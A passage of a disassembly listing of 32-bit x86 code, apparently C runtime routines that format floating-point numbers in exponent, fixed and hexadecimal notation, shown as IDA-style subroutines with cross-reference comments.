		mov	eax, [ebp+var_10]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		mov	[esi], al

loc_4110CF:				; CODE XREF: sub_411014+A1j
		xor	eax, eax
		cmp	[ebp+arg_10], al
		setz	al
		add	eax, [ebp+arg_4]
		add	esi, eax
		cmp	[ebp+arg_0], 0FFFFFFFFh
		jnz	short loc_4110E7
		or	ebx, 0FFFFFFFFh
		jmp	short loc_4110EC
; ---------------------------------------------------------------------------

loc_4110E7:				; CODE XREF: sub_411014+CCj
		sub	ebx, esi
		add	ebx, [ebp+arg_0]

loc_4110EC:				; CODE XREF: sub_411014+D1j
		push	offset aE000	; "e+000"
		push	ebx
		push	esi
		call	sub_407C95
		add	esp, 0Ch
		xor	ebx, ebx
		test	eax, eax
		jz	short loc_41110E
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4033CB
		add	esp, 14h

loc_41110E:				; CODE XREF: sub_411014+EBj
		cmp	[ebp+arg_8], ebx
		lea	ecx, [esi+2]
		jz	short loc_411119
		mov	byte ptr [esi],	45h

loc_411119:				; CODE XREF: sub_411014+100j
		mov	eax, [edi+0Ch]
		inc	esi
		cmp	byte ptr [eax],	30h
		jz	short loc_411150
		mov	eax, [edi+4]
		dec	eax
		jns	short loc_41112D
		neg	eax
		mov	byte ptr [esi],	2Dh

loc_41112D:				; CODE XREF: sub_411014+112j
		inc	esi
		cmp	eax, 64h
		jl	short loc_41113D
		cdq
		push	64h
		pop	edi
		idiv	edi
		add	[esi], al
		mov	eax, edx

loc_41113D:				; CODE XREF: sub_411014+11Dj
		inc	esi
		cmp	eax, 0Ah
		jl	short loc_41114D
		cdq
		push	0Ah
		pop	edi
		idiv	edi
		add	[esi], al
		mov	eax, edx

loc_41114D:				; CODE XREF: sub_411014+12Dj
		add	[esi+1], al

loc_411150:				; CODE XREF: sub_411014+10Cj
		test	byte_4288C4, 1
		jz	short loc_41116D
		cmp	byte ptr [ecx],	30h
		jnz	short loc_41116D
		push	3
		lea	eax, [ecx+1]
		push	eax
		push	ecx
		call	sub_407930
		add	esp, 0Ch

loc_41116D:				; CODE XREF: sub_411014+143j
					; sub_411014+148j
		cmp	[ebp+var_4], 0
		jz	short loc_41117A
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_41117A:				; CODE XREF: sub_411014+15Dj
		xor	eax, eax

loc_41117C:				; CODE XREF: sub_411014+42j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_411014	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411181	proc near		; CODE XREF: sub_41124F+14p
					; sub_411884+7Cp

var_2C		= dword	ptr -2Ch
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_4]
		push	16h
		pop	esi
		push	esi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_2C]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411D31
		xor	ebx, ebx
		add	esp, 14h
		cmp	edi, ebx
		jnz	short loc_4111D1

loc_4111B9:				; CODE XREF: sub_411181+55j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_411240
; ---------------------------------------------------------------------------

loc_4111D1:				; CODE XREF: sub_411181+36j
		mov	eax, [ebp+arg_8]
		cmp	eax, ebx
		jbe	short loc_4111B9
		cmp	eax, 0FFFFFFFFh
		mov	esi, [ebp+arg_C]
		jnz	short loc_4111E5
		or	eax, 0FFFFFFFFh
		jmp	short loc_4111F9
; ---------------------------------------------------------------------------

loc_4111E5:				; CODE XREF: sub_411181+5Dj
		xor	ecx, ecx
		cmp	[ebp+var_2C], 2Dh
		setz	cl
		sub	eax, ecx
		xor	ecx, ecx
		cmp	esi, ebx
		setnle	cl
		sub	eax, ecx

loc_4111F9:				; CODE XREF: sub_411181+62j
		lea	ecx, [ebp+var_2C]
		push	ecx
		lea	ecx, [esi+1]
		push	ecx
		push	eax
		xor	eax, eax
		cmp	[ebp+var_2C], 2Dh
		setz	al
		xor	ecx, ecx
		cmp	esi, ebx
		setnle	cl
		add	eax, edi
		add	ecx, eax
		push	ecx
		call	sub_411BB9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_411227
		mov	[edi], bl
		jmp	short loc_411240
; ---------------------------------------------------------------------------

loc_411227:				; CODE XREF: sub_411181+A0j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_2C]
		push	ebx
		push	eax
		push	[ebp+arg_10]
		mov	eax, edi
		push	esi
		push	[ebp+arg_8]
		call	sub_411014
		add	esp, 18h

loc_411240:				; CODE XREF: sub_411181+4Ej
					; sub_411181+A4j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411181	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41124F	proc near		; CODE XREF: sub_41126D+BDp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	0
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_411181
		add	esp, 18h
		pop	ebp
		retn
sub_41124F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41126D	proc near		; CODE XREF: sub_411884+63p

var_24		= dword	ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		push	esi
		push	edi
		push	[ebp+arg_14]
		lea	ecx, [ebp+var_24]
		mov	[ebp+var_14], 3FFh
		xor	edi, edi
		mov	[ebp+var_4], 30h
		call	sub_402CAD
		cmp	[ebp+arg_C], edi
		jge	short loc_411298
		mov	[ebp+arg_C], edi

loc_411298:				; CODE XREF: sub_41126D+26j
		mov	esi, [ebp+arg_4]
		cmp	esi, edi
		jnz	short loc_4112CA

loc_41129F:				; CODE XREF: sub_41126D+60j
		call	sub_405D93
		push	16h

loc_4112A6:				; CODE XREF: sub_41126D+77j
		pop	esi
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_18], 0
		jz	short loc_4112C3
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4112C3:				; CODE XREF: sub_41126D+4Dj
		mov	eax, esi
		jmp	loc_4115DA
; ---------------------------------------------------------------------------

loc_4112CA:				; CODE XREF: sub_41126D+30j
		cmp	[ebp+arg_8], edi
		jbe	short loc_41129F
		mov	eax, [ebp+arg_C]
		add	eax, 0Bh
		cmp	[ebp+arg_8], eax
		mov	byte ptr [esi],	0
		ja	short loc_4112E6
		call	sub_405D93
		push	22h
		jmp	short loc_4112A6
; ---------------------------------------------------------------------------

loc_4112E6:				; CODE XREF: sub_41126D+6Ej
		mov	edi, [ebp+arg_0]
		mov	eax, [edi]
		mov	[ebp+var_C], eax
		mov	eax, [edi+4]
		mov	ecx, eax
		shr	ecx, 14h
		mov	edx, 7FFh
		push	ebx
		and	ecx, edx
		xor	ebx, ebx
		cmp	ecx, edx
		jnz	loc_411398
		test	ebx, ebx
		jnz	loc_411398
		mov	eax, [ebp+arg_8]
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_41131C
		or	eax, eax
		jmp	short loc_41131F
; ---------------------------------------------------------------------------

loc_41131C:				; CODE XREF: sub_41126D+A9j
		add	eax, 0FFFFFFFEh

loc_41131F:				; CODE XREF: sub_41126D+ADj
		push	0
		push	[ebp+arg_C]
		lea	ebx, [esi+2]
		push	eax
		push	ebx
		push	edi
		call	sub_41124F
		add	esp, 14h
		test	eax, eax
		jz	short loc_41134F
		cmp	[ebp+var_18], 0
		mov	byte ptr [esi],	0
		jz	loc_4115D9
		mov	ecx, [ebp+var_1C]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	loc_4115D9
; ---------------------------------------------------------------------------

loc_41134F:				; CODE XREF: sub_41126D+C7j
		cmp	byte ptr [ebx],	2Dh
		jnz	short loc_411358
		mov	byte ptr [esi],	2Dh
		inc	esi

loc_411358:				; CODE XREF: sub_41126D+E5j
		mov	byte ptr [esi],	30h
		inc	esi
		cmp	[ebp+arg_10], 0
		push	65h
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 78h
		mov	[esi], al
		inc	esi
		push	esi
		call	sub_411A40
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	loc_4115CA
		cmp	[ebp+arg_10], 0
		setz	cl
		dec	cl
		and	cl, 0E0h
		add	cl, 70h
		mov	[eax], cl
		mov	byte ptr [eax+3], 0
		jmp	loc_4115CA
; ---------------------------------------------------------------------------

loc_411398:				; CODE XREF: sub_41126D+95j
					; sub_41126D+9Dj
		and	eax, 80000000h
		xor	ecx, ecx
		or	ecx, eax
		jz	short loc_4113A7
		mov	byte ptr [esi],	2Dh
		inc	esi

loc_4113A7:				; CODE XREF: sub_41126D+134j
		mov	ebx, [ebp+arg_10]
		mov	byte ptr [esi],	30h
		inc	esi
		test	ebx, ebx
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 78h
		mov	[esi], al
		mov	ecx, [edi+4]
		inc	esi
		neg	ebx
		sbb	ebx, ebx
		and	ebx, 0FFFFFFE0h
		and	ecx, 7FF00000h
		xor	eax, eax
		add	ebx, 27h
		xor	edx, edx
		or	eax, ecx
		jnz	short loc_4113F8
		mov	byte ptr [esi],	30h
		mov	ecx, [edi+4]
		mov	eax, [edi]
		and	ecx, 0FFFFFh
		inc	esi
		or	eax, ecx
		jnz	short loc_4113EF
		mov	[ebp+var_14], edx
		jmp	short loc_4113FC
; ---------------------------------------------------------------------------

loc_4113EF:				; CODE XREF: sub_41126D+17Bj
		mov	[ebp+var_14], 3FEh
		jmp	short loc_4113FC
; ---------------------------------------------------------------------------

loc_4113F8:				; CODE XREF: sub_41126D+168j
		mov	byte ptr [esi],	31h
		inc	esi

loc_4113FC:				; CODE XREF: sub_41126D+180j
					; sub_41126D+189j
		mov	eax, esi
		inc	esi
		cmp	[ebp+arg_C], edx
		mov	[ebp+arg_4], eax
		jnz	short loc_41140B
		mov	[eax], dl
		jmp	short loc_41141A
; ---------------------------------------------------------------------------

loc_41140B:				; CODE XREF: sub_41126D+198j
		mov	ecx, [ebp+var_24]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		mov	cl, [ecx]
		mov	[eax], cl

loc_41141A:				; CODE XREF: sub_41126D+19Cj
		mov	ecx, [edi+4]
		mov	eax, [edi]
		and	ecx, 0FFFFFh
		mov	[ebp+var_8], ecx
		ja	short loc_411432
		cmp	eax, edx
		jbe	loc_4114E7

loc_411432:				; CODE XREF: sub_41126D+1BBj
		mov	[ebp+var_C], edx
		mov	[ebp+var_8], 0F0000h

loc_41143C:				; CODE XREF: sub_41126D+220j
		cmp	[ebp+arg_C], 0
		jle	short loc_41148F
		mov	edx, [edi+4]
		and	edx, [ebp+var_8]
		mov	eax, [edi]
		movsx	ecx, word ptr [ebp+var_4]
		and	eax, [ebp+var_C]
		and	edx, 0FFFFFh
		call	sub_411EA0
		add	ax, 30h
		movzx	eax, ax
		cmp	ax, 39h
		jbe	short loc_41146B
		add	eax, ebx

loc_41146B:				; CODE XREF: sub_41126D+1FAj
		mov	ecx, [ebp+var_8]
		sub	[ebp+var_4], 4
		mov	[esi], al
		mov	eax, [ebp+var_C]
		shrd	eax, ecx, 4
		shr	ecx, 4
		inc	esi
		dec	[ebp+arg_C]
		cmp	word ptr [ebp+var_4], 0
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], ecx
		jge	short loc_41143C

loc_41148F:				; CODE XREF: sub_41126D+1D3j
		cmp	word ptr [ebp+var_4], 0
		jl	short loc_4114E7
		mov	edx, [edi+4]
		and	edx, [ebp+var_8]
		mov	eax, [edi]
		movsx	ecx, word ptr [ebp+var_4]
		and	eax, [ebp+var_C]
		and	edx, 0FFFFFh
		call	sub_411EA0
		cmp	ax, 8
		jbe	short loc_4114E7
		lea	eax, [esi-1]

loc_4114B9:				; CODE XREF: sub_41126D+25Cj
		mov	cl, [eax]
		cmp	cl, 66h
		jz	short loc_4114C5
		cmp	cl, 46h
		jnz	short loc_4114CB

loc_4114C5:				; CODE XREF: sub_41126D+251j
		mov	byte ptr [eax],	30h
		dec	eax
		jmp	short loc_4114B9
; ---------------------------------------------------------------------------

loc_4114CB:				; CODE XREF: sub_41126D+256j
		cmp	eax, [ebp+arg_4]
		jz	short loc_4114E4
		mov	cl, [eax]
		cmp	cl, 39h
		jnz	short loc_4114DE
		add	bl, 3Ah
		mov	[eax], bl
		jmp	short loc_4114E7
; ---------------------------------------------------------------------------

loc_4114DE:				; CODE XREF: sub_41126D+268j
		inc	cl
		mov	[eax], cl
		jmp	short loc_4114E7
; ---------------------------------------------------------------------------

loc_4114E4:				; CODE XREF: sub_41126D+261j
		inc	byte ptr [eax-1]

loc_4114E7:				; CODE XREF: sub_41126D+1BFj
					; sub_41126D+227j ...
		cmp	[ebp+arg_C], 0
		jle	short loc_4114FE
		push	[ebp+arg_C]
		push	30h
		push	esi
		call	sub_408130
		add	esp, 0Ch
		add	esi, [ebp+arg_C]

loc_4114FE:				; CODE XREF: sub_41126D+27Ej
		mov	eax, [ebp+arg_4]
		cmp	byte ptr [eax],	0
		jnz	short loc_411508
		mov	esi, eax

loc_411508:				; CODE XREF: sub_41126D+297j
		cmp	[ebp+arg_10], 0
		mov	cl, 34h
		setz	al
		dec	al
		and	al, 0E0h
		add	al, 70h
		mov	[esi], al
		mov	eax, [edi]
		mov	edx, [edi+4]
		inc	esi
		call	sub_411EA0
		xor	ebx, ebx
		and	eax, 7FFh
		and	edx, ebx
		sub	eax, [ebp+var_14]
		push	ebx
		pop	ecx
		sbb	edx, ecx
		js	short loc_411542
		jg	short loc_41153C
		cmp	eax, ebx
		jb	short loc_411542

loc_41153C:				; CODE XREF: sub_41126D+2C9j
		mov	byte ptr [esi],	2Bh
		inc	esi
		jmp	short loc_41154C
; ---------------------------------------------------------------------------

loc_411542:				; CODE XREF: sub_41126D+2C7j
					; sub_41126D+2CDj
		mov	byte ptr [esi],	2Dh
		inc	esi
		neg	eax
		adc	edx, ebx
		neg	edx

loc_41154C:				; CODE XREF: sub_41126D+2D3j
		cmp	edx, ebx
		mov	edi, esi
		mov	byte ptr [esi],	30h
		jl	short loc_411579
		mov	ecx, 3E8h
		jg	short loc_411560
		cmp	eax, ecx
		jb	short loc_411579

loc_411560:				; CODE XREF: sub_41126D+2EDj
		push	ebx
		push	ecx
		push	edx
		push	eax
		call	sub_411DC0
		add	al, 30h
		mov	[esi], al
		inc	esi
		cmp	esi, edi
		mov	[ebp+var_10], edx
		mov	eax, ecx
		mov	edx, ebx
		jnz	short loc_411584

loc_411579:				; CODE XREF: sub_41126D+2E6j
					; sub_41126D+2F1j
		test	edx, edx
		jl	short loc_41159B
		jg	short loc_411584
		cmp	eax, 64h
		jb	short loc_41159B

loc_411584:				; CODE XREF: sub_41126D+30Aj
					; sub_41126D+310j
		push	0
		push	64h
		push	edx
		push	eax
		call	sub_411DC0
		add	al, 30h
		mov	[esi], al
		mov	[ebp+var_10], edx
		inc	esi
		mov	eax, ecx
		mov	edx, ebx

loc_41159B:				; CODE XREF: sub_41126D+30Ej
					; sub_41126D+315j
		cmp	esi, edi
		jnz	short loc_4115AA
		test	edx, edx
		jl	short loc_4115C2
		jg	short loc_4115AA
		cmp	eax, 0Ah
		jb	short loc_4115C2

loc_4115AA:				; CODE XREF: sub_41126D+330j
					; sub_41126D+336j
		push	0
		push	0Ah
		push	edx
		push	eax
		call	sub_411DC0
		add	al, 30h
		mov	[esi], al
		mov	[ebp+var_10], edx
		inc	esi
		mov	eax, ecx
		mov	[ebp+var_10], ebx

loc_4115C2:				; CODE XREF: sub_41126D+334j
					; sub_41126D+33Bj
		add	al, 30h
		mov	[esi], al
		mov	byte ptr [esi+1], 0

loc_4115CA:				; CODE XREF: sub_41126D+10Bj
					; sub_41126D+126j
		cmp	[ebp+var_18], 0
		jz	short loc_4115D7
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4115D7:				; CODE XREF: sub_41126D+361j
		xor	eax, eax

loc_4115D9:				; CODE XREF: sub_41126D+D0j
					; sub_41126D+DDj
		pop	ebx

loc_4115DA:				; CODE XREF: sub_41126D+58j
		pop	edi
		pop	esi
		leave
		retn
sub_41126D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4115DE	proc near		; CODE XREF: sub_4116D3+A2p
					; sub_41178C+C3p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_C]
		mov	ebx, eax
		mov	esi, [ebx+4]
		mov	edi, ecx
		lea	ecx, [ebp+var_10]
		dec	esi
		call	sub_402CAD
		test	edi, edi
		jnz	short loc_41162B

loc_4115FE:				; CODE XREF: sub_4115DE+51j
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+var_4], 0
		jz	short loc_411624
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411624:				; CODE XREF: sub_4115DE+3Dj
		mov	eax, esi
		jmp	loc_4116CE
; ---------------------------------------------------------------------------

loc_41162B:				; CODE XREF: sub_4115DE+1Ej
		cmp	[ebp+arg_0], 0
		jbe	short loc_4115FE
		cmp	[ebp+arg_8], 0
		jz	short loc_41164F
		cmp	esi, [ebp+arg_4]
		jnz	short loc_41164F
		xor	eax, eax
		cmp	dword ptr [ebx], 2Dh
		setz	al
		add	eax, esi
		add	eax, edi
		mov	byte ptr [eax],	30h
		mov	byte ptr [eax+1], 0

loc_41164F:				; CODE XREF: sub_4115DE+57j
					; sub_4115DE+5Cj
		cmp	dword ptr [ebx], 2Dh
		mov	esi, edi
		jnz	short loc_41165C
		mov	byte ptr [edi],	2Dh
		lea	esi, [edi+1]

loc_41165C:				; CODE XREF: sub_4115DE+76j
		mov	eax, [ebx+4]
		xor	edi, edi
		inc	edi
		test	eax, eax
		jg	short loc_411673
		mov	eax, esi
		call	sub_410FDB
		mov	byte ptr [esi],	30h
		inc	esi
		jmp	short loc_411675
; ---------------------------------------------------------------------------

loc_411673:				; CODE XREF: sub_4115DE+86j
		add	esi, eax

loc_411675:				; CODE XREF: sub_4115DE+93j
		cmp	[ebp+arg_4], 0
		jle	short loc_4116BF
		mov	eax, esi
		call	sub_410FDB
		mov	eax, [ebp+var_10]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		mov	[esi], al
		mov	ebx, [ebx+4]
		inc	esi
		test	ebx, ebx
		jge	short loc_4116BF
		neg	ebx
		cmp	[ebp+arg_8], 0
		jnz	short loc_4116A6
		cmp	[ebp+arg_4], ebx
		jl	short loc_4116A9

loc_4116A6:				; CODE XREF: sub_4115DE+C1j
		mov	[ebp+arg_4], ebx

loc_4116A9:				; CODE XREF: sub_4115DE+C6j
		mov	edi, [ebp+arg_4]
		mov	eax, esi
		call	sub_410FDB
		push	edi
		push	30h
		push	esi
		call	sub_408130
		add	esp, 0Ch

loc_4116BF:				; CODE XREF: sub_4115DE+9Bj
					; sub_4115DE+B9j
		cmp	[ebp+var_4], 0
		jz	short loc_4116CC
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_4116CC:				; CODE XREF: sub_4115DE+E5j
		xor	eax, eax

loc_4116CE:				; CODE XREF: sub_4115DE+48j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4115DE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4116D3	proc near		; CODE XREF: sub_411884+24p

var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_4]
		push	16h
		pop	esi
		push	esi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_2C]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411D31
		xor	ebx, ebx
		add	esp, 14h
		cmp	edi, ebx
		jnz	short loc_411723

loc_41170B:				; CODE XREF: sub_4116D3+55j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], esi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	short loc_41177D
; ---------------------------------------------------------------------------

loc_411723:				; CODE XREF: sub_4116D3+36j
		mov	eax, [ebp+arg_8]
		cmp	eax, ebx
		jbe	short loc_41170B
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_411733
		or	eax, eax
		jmp	short loc_41173E
; ---------------------------------------------------------------------------

loc_411733:				; CODE XREF: sub_4116D3+5Aj
		xor	ecx, ecx
		cmp	[ebp+var_2C], 2Dh
		setz	cl
		sub	eax, ecx

loc_41173E:				; CODE XREF: sub_4116D3+5Ej
		mov	esi, [ebp+arg_C]
		lea	ecx, [ebp+var_2C]
		push	ecx
		mov	ecx, [ebp+var_28]
		add	ecx, esi
		push	ecx
		push	eax
		xor	eax, eax
		cmp	[ebp+var_2C], 2Dh
		setz	al
		add	eax, edi
		push	eax
		call	sub_411BB9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_411768
		mov	[edi], bl
		jmp	short loc_41177D
; ---------------------------------------------------------------------------

loc_411768:				; CODE XREF: sub_4116D3+8Fj
		push	[ebp+arg_10]
		lea	eax, [ebp+var_2C]
		push	ebx
		push	esi
		push	[ebp+arg_8]
		mov	ecx, edi
		call	sub_4115DE
		add	esp, 10h

loc_41177D:				; CODE XREF: sub_4116D3+4Ej
					; sub_4116D3+93j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_4116D3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41178C	proc near		; CODE XREF: sub_411884+4Ap

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_4]
		push	edi
		push	16h
		pop	edi
		push	edi
		lea	ecx, [ebp+var_1C]
		push	ecx
		lea	ecx, [ebp+var_30]
		push	ecx
		push	dword ptr [eax+4]
		push	dword ptr [eax]
		call	sub_411D31
		xor	ebx, ebx
		add	esp, 14h
		cmp	esi, ebx
		jnz	short loc_4117DF

loc_4117C4:				; CODE XREF: sub_41178C+58j
		call	sub_405D93
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	[eax], edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, edi
		jmp	loc_411875
; ---------------------------------------------------------------------------

loc_4117DF:				; CODE XREF: sub_41178C+36j
		mov	ecx, [ebp+arg_8]
		cmp	ecx, ebx
		jbe	short loc_4117C4
		mov	eax, [ebp+var_2C]
		dec	eax
		mov	[ebp+var_20], eax
		xor	eax, eax
		cmp	[ebp+var_30], 2Dh
		setz	al
		cmp	ecx, 0FFFFFFFFh
		lea	edi, [eax+esi]
		jnz	short loc_411802
		or	ecx, ecx
		jmp	short loc_411804
; ---------------------------------------------------------------------------

loc_411802:				; CODE XREF: sub_41178C+70j
		sub	ecx, eax

loc_411804:				; CODE XREF: sub_41178C+74j
		lea	eax, [ebp+var_30]
		push	eax
		push	[ebp+arg_C]
		push	ecx
		push	edi
		call	sub_411BB9
		add	esp, 10h
		cmp	eax, ebx
		jz	short loc_41181D
		mov	[esi], bl
		jmp	short loc_411875
; ---------------------------------------------------------------------------

loc_41181D:				; CODE XREF: sub_41178C+8Bj
		mov	eax, [ebp+var_2C]
		dec	eax
		cmp	[ebp+var_20], eax
		setl	cl
		cmp	eax, 0FFFFFFFCh
		jl	short loc_411859
		cmp	eax, [ebp+arg_C]
		jge	short loc_411859
		cmp	cl, bl
		jz	short loc_41183F

loc_411835:				; CODE XREF: sub_41178C+AEj
		mov	al, [edi]
		inc	edi
		test	al, al
		jnz	short loc_411835
		mov	[edi-2], bl

loc_41183F:				; CODE XREF: sub_41178C+A7j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_30]
		push	1
		push	[ebp+arg_C]
		mov	ecx, esi
		push	[ebp+arg_8]
		call	sub_4115DE
		add	esp, 10h
		jmp	short loc_411875
; ---------------------------------------------------------------------------

loc_411859:				; CODE XREF: sub_41178C+9Ej
					; sub_41178C+A3j
		push	[ebp+arg_14]
		lea	eax, [ebp+var_30]
		push	1
		push	eax
		push	[ebp+arg_10]
		mov	eax, esi
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		call	sub_411014
		add	esp, 18h

loc_411875:				; CODE XREF: sub_41178C+4Ej
					; sub_41178C+8Fj ...
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_41178C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411884	proc near		; CODE XREF: sub_41190A+17p
					; DATA XREF: sub_40FCCB+37o ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_C]
		cmp	eax, 65h
		jz	short loc_4118EE
		cmp	eax, 45h
		jz	short loc_4118EE
		cmp	eax, 66h
		jnz	short loc_4118B2
		push	[ebp+arg_18]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_4116D3
		add	esp, 14h
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4118B2:				; CODE XREF: sub_411884+13j
		cmp	eax, 61h
		jz	short loc_4118D5
		cmp	eax, 41h
		jz	short loc_4118D5
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_41178C
		jmp	short loc_411905
; ---------------------------------------------------------------------------

loc_4118D5:				; CODE XREF: sub_411884+31j
					; sub_411884+36j
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_41126D
		jmp	short loc_411905
; ---------------------------------------------------------------------------

loc_4118EE:				; CODE XREF: sub_411884+9j
					; sub_411884+Ej
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_411181

loc_411905:				; CODE XREF: sub_411884+4Fj
					; sub_411884+68j
		add	esp, 18h
		pop	ebp
		retn
sub_411884	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41190A	proc near		; DATA XREF: sub_40FCCBo
					; .data:off_424F80o ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		push	0
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
